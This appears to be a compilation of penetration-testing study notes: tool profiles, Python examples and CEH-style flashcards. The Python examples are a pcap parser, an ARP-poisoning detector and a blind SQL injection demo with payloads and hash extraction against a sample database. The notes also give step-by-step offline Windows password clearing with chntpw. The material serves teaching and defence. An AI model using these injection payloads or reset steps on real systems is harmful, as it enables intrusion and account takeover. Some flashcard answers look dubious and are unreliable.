On Linux, raw USB traffic can also be captured.
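The encapsulation and display-filter ideas above, as an added example in Python that is not Wireshark's own code: a minimal libpcap reader that peels Ethernet, IPv4 and TCP/UDP headers into Wireshark-style field names, plus a tiny display filter over those fields. The capture it parses is constructed inline (addresses from the documentation ranges; IP and transport checksums are left at zero, which Wireshark would flag as bad), so it runs offline.

```python
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4          # native-order libpcap magic, microsecond timestamps
LINKTYPE_ETHERNET = 1
ETH_HDR = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"


def udp_frame(src_ip, dst_ip, sport, dport, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/UDP frame. Checksums are left at zero."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp) + len(payload), 1, 0,
                     64, 17, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return ETH_HDR + ip + udp + payload


def tcp_frame(src_ip, dst_ip, sport, dport, flags, payload: bytes = b"") -> bytes:
    """Constructed Ethernet/IPv4/TCP frame (data offset 5, no options)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1000, 0, 5 << 4, flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 2, 0,
                     64, 6, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return ETH_HDR + ip + tcp + payload


def build_pcap(frames) -> bytes:
    """Wrap frames in a libpcap file: 24-byte global header + 16-byte record headers."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out


def _mac(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def dissect_frame(frame: bytes) -> dict:
    """Peel the encapsulation layers and return Wireshark-style field names."""
    fields = {"eth.dst": _mac(frame[0:6]), "eth.src": _mac(frame[6:12]),
              "eth.type": struct.unpack_from("!H", frame, 12)[0]}
    if fields["eth.type"] != 0x0800:          # only IPv4 is dissected here
        return fields
    ihl = (frame[14] & 0x0F) * 4
    total_len = struct.unpack_from("!H", frame, 16)[0]
    proto = frame[23]
    fields.update({"ip.src": socket.inet_ntoa(frame[26:30]),
                   "ip.dst": socket.inet_ntoa(frame[30:34]), "ip.proto": proto})
    l4 = 14 + ihl
    if proto == 17:
        sport, dport, ulen, _ = struct.unpack_from("!HHHH", frame, l4)
        fields.update({"udp.srcport": sport, "udp.dstport": dport,
                       "udp.port": {sport, dport}, "data": frame[l4 + 8:l4 + ulen]})
    elif proto == 6:
        sport, dport, _seq, _ack, off, flags = struct.unpack_from("!HHIIBB", frame, l4)
        doff = (off >> 4) * 4
        fields.update({"tcp.srcport": sport, "tcp.dstport": dport,
                       "tcp.port": {sport, dport}, "tcp.flags": flags,
                       "data": frame[l4 + doff:14 + total_len]})
    return fields


def read_pcap(data: bytes) -> list:
    """Parse a libpcap file into a list of dissected packets."""
    magic, _maj, _min, _tz, _sig, _snap, linktype = struct.unpack_from("<IHHiIII", data, 0)
    if magic != PCAP_MAGIC or linktype != LINKTYPE_ETHERNET:
        raise ValueError("unsupported pcap: magic=%#x linktype=%d" % (magic, linktype))
    packets, off = [], 24
    while off + 16 <= len(data):
        ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack_from("<IIII", data, off)
        off += 16
        pkt = dissect_frame(data[off:off + incl_len])
        pkt["frame.time_epoch"] = ts_sec
        packets.append(pkt)
        off += incl_len
    return packets


def display_filter(packets, field: str, value) -> list:
    """Tiny equivalent of a Wireshark display filter such as udp.port == 53.
    Fields like udp.port hold both ends of the conversation, as in Wireshark."""
    return [p for p in packets
            if p.get(field) == value or (isinstance(p.get(field), set) and value in p[field])]


# Constructed sample capture: a DNS query, an NTP query and an HTTP SYN.
SAMPLE_PCAP = build_pcap([
    udp_frame("10.0.0.5", "10.0.0.1", 5353, 53, b"\x12\x34\x01\x00" + b"\x00" * 8),
    udp_frame("10.0.0.7", "10.0.0.1", 123, 123, b"\x1b" + b"\x00" * 47),
    tcp_frame("10.0.0.5", "198.51.100.10", 40000, 80, 0x02),   # SYN
])

if __name__ == "__main__":
    pkts = read_pcap(SAMPLE_PCAP)
    for p in display_filter(pkts, "udp.port", 53):
        print(p["ip.src"], "->", p["ip.dst"], "dns, %d payload bytes" % len(p["data"]))
```

Real captures add VLAN tags, IP options, IPv6 and the pcapng container, which is why production tooling uses Wireshark's dissectors (or a library such as scapy) rather than hand-written offsets; the point here is to see where each layer's header begins.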
L0phtCrack
L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given
proper access) from stand-alone Windows workstations, networked servers, primary domain
controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has
numerous methods of generating password guesses (dictionary, brute force, etc.). LC5 was
discontinued by Symantec in 2006, then re-acquired by the original L0pht team and reborn as
LC6 in 2009.
Burp suite
Burp Suite is an integrated platform for performing security testing of web applications.
Its tools work together to support the whole testing process, from initial mapping and
analysis of an application's attack surface through to finding and exploiting security
vulnerabilities. Its core is an intercepting proxy: the browser is pointed at Burp, every
request and response passes through it, and the tester can inspect, modify and replay
traffic (Repeater) or fuzz parameters with payload lists (Intruder).
Burp gives you full control, letting you combine advanced manual techniques with
automation to make your work faster and more effective.
Nessus
Nessus is a proprietary vulnerability scanner developed by Tenable Network Security.
Nessus scans for the following types of vulnerabilities:
Vulnerabilities that allow a remote attacker to control a system or access sensitive data on it.
Misconfiguration (e.g. open mail relay, missing patches, etc.).
Default passwords, a few common passwords, and blank/absent passwords on some system
accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
Denial of service against the TCP/IP stack using malformed packets (these checks are off
by default, behind the "safe checks" setting, because they can crash fragile targets).
Preparation for PCI DSS audits.
Nessus provides additional functionality beyond testing for known network vulnerabilities.
Given Windows credentials it can log in and examine patch levels on computers running the
Windows operating system (a credentialed scan, which finds far more than an unauthenticated
one), and it can perform password auditing using dictionary and brute-force methods.
Nessus 3 and later can also audit systems to make sure they have been configured per a
specific policy, such as the NSA's guide for hardening Windows servers. This functionality
uses Tenable's proprietary audit files or Security Content Automation Protocol (SCAP)
content.
Ettercap (software)
Ettercap is a free and open-source network security tool for man-in-the-middle attacks on a
LAN. It can be used for network protocol analysis and security auditing. It runs on various
Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft
Windows.
It is capable of intercepting traffic on a network segment, capturing passwords, and
conducting active eavesdropping against a number of common protocols. Its original
developers later founded Hacking Team. Ettercap works by putting the network interface
into promiscuous mode and ARP-poisoning the target machines: it sends forged ARP replies so
that the victim maps the gateway's IP address to the attacker's MAC (and the gateway maps
the victim's IP the same way), after which both directions of traffic pass through the
attacker, who can read or modify it before forwarding it. Ettercap has plugin support so
that its features can be extended by adding new plugins.
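The ARP-poisoning mechanism described above leaves a visible trace on the wire, and the check a tester (or the blue team reviewing the engagement) wants is whether the segment shows it. The following is an added example in Python, not Ettercap's own code, that looks for the two signatures in a list of observed ARP replies: one IP announced by more than one MAC, and one MAC announcing several IPs. The reply list is constructed inline and the `trusted` baseline is an assumption standing in for the gateway MAC noted from `arp -a` before the test.

```python
from collections import defaultdict

# Constructed sample: ARP "is-at" replies seen on a segment as (time, sender_ip, sender_mac).
SAMPLE_ARP_REPLIES = [
    (1.0, "10.0.0.1", "aa:bb:cc:00:00:01"),   # gateway answering normally
    (1.5, "10.0.0.5", "aa:bb:cc:00:00:05"),   # workstation
    (2.0, "10.0.0.1", "aa:bb:cc:00:00:01"),
    (3.0, "10.0.0.1", "de:ad:be:ef:00:99"),   # a third MAC now claims the gateway's IP ...
    (3.1, "10.0.0.5", "de:ad:be:ef:00:99"),   # ... and the workstation's: both sides poisoned
    (4.0, "10.0.0.1", "de:ad:be:ef:00:99"),
]


def find_arp_conflicts(replies, trusted=None):
    """Flag the patterns ARP poisoning leaves in traffic; returns a list of
    (rule, subject, evidence) tuples:
      - one IP announced by more than one MAC (the poisoned mapping itself);
      - one MAC announcing several IPs (the attacker impersonating both ends);
      - a MAC other than the one in the `trusted` {ip: mac} baseline claiming that IP.
    """
    ip_to_macs = defaultdict(dict)      # ip  -> {mac: first_seen}
    mac_to_ips = defaultdict(set)       # mac -> {ip, ...}
    for ts, ip, mac in replies:
        ip_to_macs[ip].setdefault(mac.lower(), ts)
        mac_to_ips[mac.lower()].add(ip)

    alerts = []
    for ip, macs in ip_to_macs.items():
        if len(macs) > 1:
            # report the newcomers; the MAC seen first is the likely legitimate owner
            legit = min(macs, key=macs.get)
            alerts.append(("ip-claimed-by-multiple-macs", ip,
                           sorted(m for m in macs if m != legit)))
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append(("mac-claims-multiple-ips", mac, sorted(ips)))
    for ip, mac in (trusted or {}).items():
        impostors = sorted(m for m in ip_to_macs.get(ip, {}) if m != mac.lower())
        if impostors:
            alerts.append(("trusted-mapping-violated", ip, impostors))
    return alerts


if __name__ == "__main__":
    for rule, subject, evidence in find_arp_conflicts(
            SAMPLE_ARP_REPLIES, trusted={"10.0.0.1": "aa:bb:cc:00:00:01"}):
        print("%-30s %-20s %s" % (rule, subject, ", ".join(evidence)))
```

To feed it real traffic, export replies with tshark (`-Y "arp.opcode == 2" -T fields -e frame.time_epoch -e arp.src.proto_ipv4 -e arp.src.hw_mac`). Expect benign hits from DHCP lease changes, HSRP/VRRP virtual MACs and NIC failover; the trusted-baseline rule is the one with the fewest false positives.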
Maltego
BackTrack
BackTrack was a Linux distribution that focused on security, aimed at digital forensics and
penetration testing use. It grew out of Knoppix-based live CDs and later moved to an Ubuntu
base. In March 2013 the Offensive Security team rebuilt BackTrack around the Debian
distribution and released it under the name Kali Linux, which is its successor.
BackTrack Linux is a good example of a specialized Linux distribution. Its only purpose is
to test your network, devices, and systems for security vulnerabilities, and it is packed
with the security and hacking tools used by security professionals.
Back|Track Linux is an open-source, GPL-compliant Linux distribution built by penetration
testers, for penetration testers, with development staff consisting of individuals spanning
different languages, regions, industries, and nationalities.
The evolution of Back|Track Linux took place over many years of development, penetration
tests, and unprecedented help from the security community. Back|Track originally started
with earlier live Linux distributions called Whoppix, IWHAX, and Auditor.
sqlmap
sqlmap is an open-source penetration testing tool that automates the process of detecting
and exploiting SQL injection flaws and taking over database servers. It runs from the
terminal and comes with a powerful detection engine, many niche features for the experienced
tester, and a broad range of switches covering database fingerprinting, fetching data from
the database, dumping tables in full or by a chosen range of rows or specific columns,
accessing the underlying file system, and executing commands on the operating system via
out-of-band connections.
A successful SQL injection can read sensitive data (password hashes, e-mail addresses,
usernames and so on) and, with enough database privileges, reach the host itself, which
makes it one of the most damaging web vulnerabilities; sqlmap is the most widely used tool
for confirming and exploiting it. A practical caveat: sqlmap is noisy, and its higher --risk
levels enable payloads (OR-based conditions, for example) that can modify data when the
injection point sits in an UPDATE or DELETE statement, so scope and the target's backup
state should be agreed before running it against production.
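What sqlmap automates, shown on a small scale as an added example in Python that is not sqlmap's own code: a login query built by string concatenation, the boolean-based blind test sqlmap uses to decide the parameter is injectable (a TRUE and a FALSE condition that produce different responses, with no error messages needed), character-by-character extraction of a column through that yes/no oracle, and the parameterized form of the same query, against which every payload fails. The database is an in-memory SQLite table constructed inline; the user names and hashes are sample data.

```python
import sqlite3

HEX = "0123456789abcdef"


def make_db() -> sqlite3.Connection:
    """Constructed sample: an in-memory users table with MD5-style password hashes."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                "password_hash TEXT, is_admin INTEGER)")
    con.executemany("INSERT INTO users (username, password_hash, is_admin) VALUES (?, ?, ?)",
                    [("alice", "5f4dcc3b5aa765d61d8327deb882cf99", 1),
                     ("bob", "e10adc3949ba59abbe56e057f20f883e", 0)])
    return con


def login_vulnerable(con, username: str, password_hash: str):
    """The flaw sqlmap looks for: user input concatenated into the SQL text, so a
    quote in the username ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password_hash = '%s'"
           % (username, password_hash))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username: str, password_hash: str):
    """Parameterized query: the statement is compiled first and the values are bound
    separately, so input can never change the query's structure."""
    row = con.execute("SELECT username FROM users WHERE username = ? AND password_hash = ?",
                      (username, password_hash)).fetchone()
    return row[0] if row else None


def is_boolean_injectable(login, con, known_user: str = "alice") -> bool:
    """Boolean-based blind detection, as sqlmap does it: send a TRUE and a FALSE
    condition and see whether the application behaves differently."""
    true_case = login(con, "%s' AND 1=1 --" % known_user, "x")
    false_case = login(con, "%s' AND 1=2 --" % known_user, "x")
    return true_case != false_case


def blind_extract(login, con, user: str, column: str, alphabet: str = HEX) -> str:
    """Recover a column value one character at a time using only the yes/no
    oracle; 'blind' because no query output or error text ever reaches us."""
    value = ""
    for pos in range(1, 129):
        for ch in alphabet:
            payload = "%s' AND substr(%s,%d,1)='%s' --" % (user, column, pos, ch)
            if login(con, payload, "x") == user:
                value += ch
                break
        else:
            return value            # no character matched: end of the value
    return value


if __name__ == "__main__":
    con = make_db()
    print("auth bypass:", login_vulnerable(con, "alice' --", "wrong"))
    print("injectable? vulnerable=%s safe=%s" % (
        is_boolean_injectable(login_vulnerable, con), is_boolean_injectable(login_safe, con)))
    print("alice's hash via blind SQLi:",
          blind_extract(login_vulnerable, con, "alice", "password_hash"))
```

Each extracted character costs up to 16 requests here; sqlmap cuts that with binary search over the character range and, where the backend allows, error-based or UNION techniques that return whole rows at once. The fix is the same regardless of technique: bind parameters, never concatenate.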
Armitage (computing)
Armitage is a graphical cyber-attack management tool for the Metasploit Project that
visualizes targets and recommends exploits. It is a free and open-source network security
tool notable for its red-team collaboration features: shared sessions, data and
communication through a single Metasploit instance.
With Armitage a tester can enumerate the machines on a network, including the flavor and
version of the OS on each, and from that information Armitage lists the Metasploit modules
that may apply to each host. You can run a specific exploit to see whether a machine is
compromised, or launch the "Hail Mary" option, which throws every matching exploit at a
target to determine which would succeed. Post-exploitation through Meterpreter includes
webcam shots and keystroke logging on compromised machines, which helps show the real
impact of a foothold in an assessment report. Hail Mary is loud and can crash services, so
it suits a lab or an explicitly authorised engagement rather than a stealthy assessment.
OpenVAS
OpenVAS is an open-source vulnerability scanner that can detect security issues in all
manner of servers and network devices. The description that follows is of a hosted OpenVAS
service run from an external server, where results are delivered to your e-mail address for
analysis; the same scanner can also be installed locally.
The primary reason to use this scan type is to perform comprehensive security testing of an
IP address. It first port-scans the address to find open services. Listening services are
then tested for known vulnerabilities and misconfiguration using a large database (more
than 53,000 NVT checks), and the results are compiled into a report with detailed
information on each vulnerability and notable issue discovered.
Once you receive the results, check each finding for relevance and possible false
positives. Confirmed vulnerabilities should be remediated so that your systems are not at
risk.
Scans performed from an externally hosted server give the same perspective as an attacker
on the Internet, which shows exactly what is exposed on external-facing services (but
nothing about what an insider or a phished workstation could reach).
The hosted service offers these scan types:
Full Scan: a full test of network, server and web application vulnerabilities.
Web Server Scan: a more focused test for web server and web application vulnerabilities.
WordPress Scan: tests for known WordPress vulnerabilities and web server issues.
Joomla Scan: tests for known Joomla vulnerabilities and web server issues.
chntpw
If you (or someone you know) ever forget a local Windows password, chntpw is a small Linux
utility that resets or clears it by editing the SAM registry hive offline. Here are the
steps to reset a Windows password with chntpw from a Fedora live USB.
1. Attach the live USB to the PC and restart it from the login screen.
2. Boot from the live USB and choose Try Fedora.
3. Log out from live-user and log in as root. This step is not necessary, but working as
root avoids permission issues with the mounted Windows volume.
4. Install the chntpw utility (you need a working internet connection for this):
sudo dnf install -y chntpw
5. Find the Windows partition with sfdisk -l (it is the large NTFS partition, not the small
EFI or recovery ones), create a mount point and mount it, e.g. /dev/sda2:
sudo mkdir -p /mnt/Microsoft
sudo mount /dev/sda2 /mnt/Microsoft/
If the volume only mounts read-only, Windows was shut down with Fast Startup or hibernation
enabled and the file system is marked in use; boot Windows, do a full shutdown (hold Shift
while clicking Shut down, or disable Fast Startup), and try again. A BitLocker-encrypted
volume cannot be mounted this way without the recovery key.
Change the current directory to the registry hive directory:
cd /mnt/Microsoft/Windows/System32/config/
and list the user records in the Security Account Manager (SAM) database:
sudo chntpw -l SAM
6. Edit the SAM database interactively:
sudo chntpw -i SAM
Type 1 (Edit user data and passwords), then the account name (Archit-PC in this example)
when asked for the username.
7. Type 1 to clear the user's password or 2 to set a new password for that user, then quit
and save the changes (chntpw asks before writing the hive; answer y).
8. Reboot into Windows. If you chose 1, no password is required to log in: click Sign in and
you are logged in.
Two caveats. This only works for local accounts: a Microsoft-account login is not stored as
a local SAM password. And an offline reset makes anything the old password protected
through DPAPI (EFS-encrypted files, saved browser and Windows credentials) unrecoverable,
because those keys are derived from the password you just discarded.
Zenmap
Zenmap is a free and open-source GUI for nmap. It is multiplatform and runs on Linux
(Ubuntu, Mint, Kali, Fedora, CentOS and others), Windows, Mac OS X and BSD. nmap itself is a
very powerful tool for network scanning and service discovery, but it is entirely
command-line based; Zenmap lets novice users run scans from a form and browse the results.
Zenmap GUI
Zenmap is a form front end for nmap with input fields for the scan parameters:
Target is the remote target to scan. Single or multiple targets can be given, in the same
notation nmap accepts.
Profile is a preconfigured set of scan options (speed and detail); Intense Scan is selected
in this example.
Command shows the nmap command line assembled from the given parameters; it can also be
edited directly.
Scan starts the scan.
Zenmap Portable
Zenmap vs Nmap
Zenmap is not a separate scanner: it runs the nmap command-line tool underneath, so there
is nothing to compare feature for feature; the two complement each other. Zenmap provides
no command-line interface of its own; it is a form that turns the chosen options into nmap
command-line arguments, which also makes it a good way to learn those arguments.
Putty
PuTTY is a versatile terminal program for Windows. It is the world's most popular free SSH
client. It supports SSH, telnet and raw socket connections with good terminal emulation,
public-key authentication and Kerberos single sign-on, and it includes command-line SFTP
(psftp) and SCP (pscp) implementations.
Like OpenSSH, PuTTY is a very versatile tool for remote access to another computer. It is
probably used more often by people who want secure remote shell access to a UNIX or Linux
system than for any other purpose, though that is only one of its many uses. PuTTY is more
than just an SSH client.
PuTTY works by sending typed commands and receiving text responses over a TCP/IP socket
like a traditional terminal (TTY). With SSH the session is encrypted: client and server
agree a session key through a key exchange and the server proves its identity with its host
key, after which the payload is protected with symmetric encryption and message
authentication codes. PuTTY caches host keys in the registry and warns when a server's key
changes; that warning is the check that protects against a man-in-the-middle, provided the
key was verified the first time it was accepted.
1. Nmap
Nmap turned 20 years old on September 1, 2017. Since it was first released, Nmap has been the go-to
tool for network discovery and attack surface mapping. From host discovery and port scanning, to OS
detection and IDS evasion / spoofing, Nmap is an essential tool for gigs both large and small.
2. Aircrack-ng
Like Nmap, Aircrack-ng is one of those tools that pen testers not only know, if they're assessing a
wireless network, they're using it on a regular basis. Aircrack-ng is a full suite of wireless assessment
tools, covering packet capture and attacking (including cracking WPA and WEP).
3. Wifiphisher
Wifiphisher is a rogue access point tool, enabling automated phishing attacks against Wi-Fi networks.
Assessments using Wifiphisher can lead to credential harvesting or actual infection, depending on the
scope of the job. A full overview is available in the documentation section on the Wifiphisher website.
4. Burp Suite
Used with a web browser to map applications, Burp Suite can discover a given app's functionality and
security issues. From there, it's possible to launch custom attacks.
Currently, the free version is pretty limited, but the paid version ($349 per user) offers full crawling
and scanning (supporting more than 100 vulnerabilities – including all of the OWASP Top 10);
multiple attack points, and scope-based configurations). One of the most common remarks we heard
about this tool is that it can be used to automate repetitive functions, and offers a decent view of what
the app is doing with the server.
5. OWASP ZAP
OWASP Zed Attack Proxy (ZAP) was another application testing tool mentioned alongside Burp
Suite. The general view is that ZAP is good for those that are just starting out with application
security, while Burp Suite is the go to hardcore assessment tool. Those who are concerned about price
lean towards ZAP because it is open source. OWASP recommends ZAP for application testing, and
they've published a number of tutorials for making it work in a long-term security project.
6. SQLmap
As the website says, SQLmap is an "automatic SQL Injection and database takeover tool." This
description really explains the heart of the tool itself. It supports all the common and widely used
database platforms – MySQL, MSSQL, Access, DB2, PostgreSQL, Sybase, SQLite – and six
different SQL injection techniques (boolean-based blind, time-based blind, error-based,
UNION query-based, stacked queries and out-of-band).
7. CME (CrackMapExec)
CME is a post-exploitation tool that will help automate the task of assessing the security of large
Active Directory networks. Its author, a hacker known as 'byt3bl33d3r' says the tool follows the
concept of living off the land by "abusing built-in Active Directory features/protocols to achieve its
functionality and allowing it to evade most endpoint protection/IDS/IPS solutions."
While the red team case for using CME is clear, blue teams can also use the tool to assess account
privileges, simulate attacks, and find misconfigurations. CME also makes use of the PowerSploit
Toolkit and the Impacket library.
8. Impacket
Impacket, which is used by CME, is a collection of Python classes for low-level programmatic access
to protocols such as SMB1-3, and to TCP, UDP, ICMP, IGMP and ARP on IPv4/IPv6. Packets can be
constructed from scratch or parsed from raw data.
9. PowerSploit
PowerSploit is a collection of modules that can be used during assessments. As the name suggests, the
modules themselves are for PowerShell on Windows. Some of the features include persistence, AV
bypasses, exfiltration, code execution, script modification, reconnaissance, and more.
10. Luckystrike
Luckystrike, from curi0usJack, is a generator of malicious Excel (.xls) and Word (.doc) documents.
Luckystrike can work with standard shell commands, PowerShell scripts, and EXEs. Additional
information and usage details are available here.
11. BeEF
BeEF (the Browser Exploitation Framework) is a handy tool to assess the "actual security posture
of a target environment by using client-side attack vectors." Several professionals mentioned BeEF
in passing, and noted that it was rather easy to use given the number of features and options the
tool offers. You can learn more about BeEF here.
12. THC-Hydra
THC-Hydra is a network login cracker that supports several services. In fact, it supports more than
four dozen of them, including Cisco auth, Cisco enable, IMAP, IRC, LDAP, MS-SQL, MYSQL,
Rlogin, Rsh, RTSP, and SSH (v1 & v2). The tool isn't overly complex, and the extensive README
file covers plenty of detail to get users started.
13. Immunity Debugger
The Immunity Debugger is a tool that will help security professionals write exploits, analyze malware,
and reverse engineer binaries. There are a ton of features, but the two writeups that best cover a
majority of them are an overview by Igor Novkovic and a SANS Reading Room paper on basic
reverse engineering. If reversing or exploit writing are in your wheelhouse, this tool is likely
something you're familiar with already, if it isn't – it's worth a look.
14. SET (Social-Engineer Toolkit)
As the name suggests, SET is a pen testing framework geared towards social engineering. It's a
popular tool, and has even been featured on television. Hackers were pleased to see some reality on
TV when SET was actively used on USA Network's Mr. Robot.
There are two other tools from TrustedSec that are also worth mentioning: Unicorn, which is a tool for
using PowerShell downgrade attacks and injecting code directly into memory (this works great with
SET), and nps_payload, which generates payloads for intrusion detection avoidance.
15. Metasploit
The Metasploit Framework is so commonly used, we almost didn't add it to the list. However, it had
more mentions than any other tool outside of Kali Linux. (Kali is a Linux distribution, and it has many
of the tools mentioned here pre-installed.)
Metasploit has been the main tool for many pen testing professionals for years. Even after it was
acquired by Rapid7, it remains fully supported as an open source project and is constantly being
developed by an entire community of exploit developers and coders. If a vulnerability or exploit is in
the news, Metasploit will have it. Need to assess the security of a network against older
vulnerabilities? Metasploit can do that.
16. HighOn.Coffee cheat sheet
The HighOn.Coffee blog's penetration tools cheat sheet offers a high-level reference for several
common commands, from network configuration, to port scanning and attacking network services.
17. SecLists
SecLists, as the name suggests, is a collection of lists (usernames, passwords, common data patterns,
fuzzing payloads, shells, etc.) available on GitHub to help pen testers get a jump on their current
assignment.
Flashcards
From the following, identify the attack in which an attacker exploits the default configuration
and settings of off-the-shelf libraries and code.
Shrink-Wrap Code Attacks
Identify the hacking phase in which an attacker tries to gather information about the target
prior to launching an attack.
Reconnaissance
In which type of social engineering technique does an attacker secretly observe the target
to gain critical information such as passwords, credit card information, etc.?
Shoulder Surfing
Google supports several advanced operators that help in modifying the search. Which of
the following Google advanced search operator displays the web pages stored in the Google
cache
[cache:]
Which command can be used to view NetBIOS information?
nbtstat
What is the last phase before you attempt to gain access to systems?
Enumeration
A sparse infector virus ________.
Infects Files Selectively
Social Engineering can be thwarted using what kind of controls? (select all that apply)
Technical , Administrative, Physical
Social Engineering preys on many weaknesses, including _____________. (choose all that
apply)
Technology, People, Human nature, Physical
You receive word of an unauthorized charge to your credit card. What type of attack is
this?
Identity Theft
Using __________, when talking to a victim can make the attack easier.
Keywords
An attack that includes an enticing link to click on, is what type of attack?
Phishing
Groups and individuals who hack systems based on principle or personal beliefs are known
as __________.
Hacktivists
Which DoS attack sends traffic with a spoofed IP of the target itself?
Land
What is an eight in one DoS tool that can launch such attacks as land and teardrop?
Targa
Which of the following is used to access content outside the root of a website?
Directory Traversal
What is used to monitor application errors and violations on a web server or application?
Logs
Groups and individuals who hack web server or web application based on a principle or
personal belief are?
Hacktivists
What may be helpful in protecting the content of a web server from being viewed by
unauthorized personnel?
Encryption
What type of database has information spread across many disparate systems?
Distributed
A blind SQL injection attack is used when which of the following is true?
Error messages are not available
Which of the following is designed to locate wireless access points?
Site Survey
What could a company do to protect itself from a loss of data when a phone is stolen?
Passwords, Encryption, Remote wipe
Session hijacking can be used against a mobile device using all the following Except?
Worms
Which technology can provide protection against session hijacking?
IPSec
What option would you use to install software that's not from the Google Play store?
Install from unknown sources
Session hijacking can be performed on all the following except which one?
IPSEC
A session hijack can be initiated from all the following except which one?
Cookies and devices
An ethical hacker sends a packet with a deliberate and specific path to its destination.
What technique is being used?
Source Routing
Which type of biometrics is frequently found on laptops but can be used on entryways as
well?
Fingerprint
Which of the following is used to prevent cars from ramming the building?
Bollard
Dogs make good addition to security, but what is the concern with dogs?
Liability
Which of the following is a characteristic of USB flash drives that makes security a
problem?
Easily Hidden
What type of cloud service would provide email hosting and associated security services?
SaaS
What can be used instead of a URL to evade some firewalls used to protect a cloud-based
web application?
IP Address
What system is used as a choke point for traffic and could be offered through IaaS?
Bastion Host
Which of the following issues would be a good reason for migrating to the cloud
environment? (Select all that apply)
Reduce Cost, Improve Performance, Increased Redundancy
Rules of engagement
What are two popular command line tools used to query a DNS server?
dig and nslookup
What protocol supports querying of data related to entities who register public domains
and other Internet resources?
Whois
What is the term that defines the process of turning passive reconnaissance results into
directions or launch points for active reconnaissance and preliminary attacks?
Weaponization
What must you do after a vulnerability scan to ensure that the weaknesses are actually
exploitable?
validate the vulnerabilities
A web server running Apache would point to what operating system type?
Linux
What term describes an attempt to gain information about targeted computers and
networks without actively engaging with the systems?
Passive reconnaissance
What social engineering technique is described by telling an employee that a decision must
be made within a small amount of time?
Urgency
What term describes a method where an attacker attempts to obtain sensitive information
from a user by posing as a trustworthy figure through email?
Phishing
What term describes phishing over phone/cell phone/VoIP, i.e. voice communication, which
creates more trust than SMS?
Vishing
What term describes a type of attack where the attacker slips into a secure area by
following an authorized employee?
Tailgating
What is a term that describes the act of surmounting a height-based physical barrier in
order to gain access to a restricted area?
Fence Jumping
What is the term used to describe a process that queries a device or service for information
about its configuration and resources and is an important part of active reconnaissance?
Enumeration
What term describes a connection type that allows any client to make an unauthenticated
connection to the IPC$ (interprocess communication) share on the host?
Null Session
What type of scan verifies a network adheres to policy requirements, as mandated by law,
industry, or individual company?
Compliance
What tool can be used to check if apps are listening on random ports?
Netstat
What term defines the process of evaluating and ranking vulnerabilities in terms of the
potential threat they may pose to the organization?
Adjudication
What term describes a mechanism that delivers the payload, otherwise known as sequence
of commands that takes advantage of a vulnerability?
Exploitation
What term describes code that has been compiled into an executable on one platform, but
is designed to run on a different platform?
Cross-compiled code
What term describes an attack in where passwords in the wordlist have been pre-computed
into their corresponding hashes, then compressed in a highly efficient manner?
Rainbow table attack
What term describes a software or hardware tool that can intercept and log traffic on a
digital network?
Sniffing
What term describes taking a user's or client's place after it has established a TCP
connection with a server?
TCP Session Hijacking
What Browser Session Hijacking method that uses ARP poisoning and Wireshark to sniff
the user's HTTP session and steal the cookie?
Sidejacking
What type of attack is described by setting up a rogue access point use to deceive users into
believing that it is a legitimate access point?
Evil Twin Attack
What is the term that describes any condition that allows attackers to gain elevated access
to a compromised Windows system?
Privilege Escalation
What term describes the act of attempting to deduce or decode encrypted passwords?
Password Cracking
What mobile operating system is based on Linux?
Android
What exploit overwrites the firmware, bypassing security controls which gives users root
privilege and can install unauthorized applications including malware?
Jailbreaking
What term describes an attack in which malicious JavaScript is inserted and executes on
the client's browser?
Cross-Site Scripting
What term describes an attack where an established trust between an authorized user and
a website is exploited?
Cross-Site Request Forgery
What term describes an attack where a user is fooled into clicking a web page link that is
different from where they had intended to land?
Clickjacking
What type of testing is a dynamic testing method used to identify vulnerabilities in apps by
sending the app random or unusual input and noting any failures?
Fuzz Testing
What term describes the process of manipulating a program's running state in order to
analyze it for general bugs, vulnerabilities, and other issues?
Debugging
What term describes the process of moving from one part of a computing environment to
another; Example: from one network host to another?
Lateral Movement
What term describes the process of compromising one host that enables an attacker or pen
tester to extend to other hosts that would otherwise be inaccessible?
Pivoting
What term describes a hidden mechanism that provides access to a system through some
unconventional means?
Backdoors
A Bind Shell is a shell that is bound to a local network port on the target system. Linux
target binds Bash shell to what port by default?
12345
What term describes an instance of execution of a process or running of a script that the
system performs on a set schedule?
Scheduled Task
What term describes the process of stripping user-supplied input of unwanted or untrusted
data so that the application can safely process the input?
Input Sanitization
What term describes the technique of processing SQL input by incorporating placeholders
for some of a query's parameters?
Parameterized Queries
What term describes the process of reducing redundancy and increasing integrity to create
a unified set of data?
Data Normalization
What term describes the amount and type of potential vulnerabilities and threats the
organization is willing to tolerate and endure?
Risk Appetite
What report type can help management see the effectiveness of security with respect to new
technology?
KPIs